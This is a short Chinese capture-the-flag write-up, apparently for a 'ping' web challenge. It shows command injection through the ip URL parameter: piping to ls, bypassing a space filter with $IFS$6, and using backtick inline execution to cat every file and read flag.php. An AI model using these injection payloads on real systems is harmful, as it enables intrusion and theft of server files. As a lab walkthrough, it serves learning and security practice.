我们先打开环境
我们看到了/?ip= 想到可能是在url中进行pingpingping
在url中输入 /?ip=127.0.0.1
看到了有回显 接着输入/?ip=127.0.0.1 | ls
提示错误,空格被过滤了,那我们就不要空格,输入/?ip=127.0.0.1|ls
显示了两个文件,flag就在flag.php中,之后我们需要使用绕过空格的方法,网上有很多,我使用了其中一个,输入/?127.0.0.1|cat$IFS$6index.php(这儿的数字6换成其他数字也行)
看到这儿,好多绕过的方法都被过滤了,剩下的我都不会。。。。网上搜索其他方法
看到他没有过滤符号` 我用的是内联执行法,就是先执行ls,再用cat把所有文件打开
构建url: /?ip=127.0.0.1;cat$IFS$6`ls`
查看源码得到flag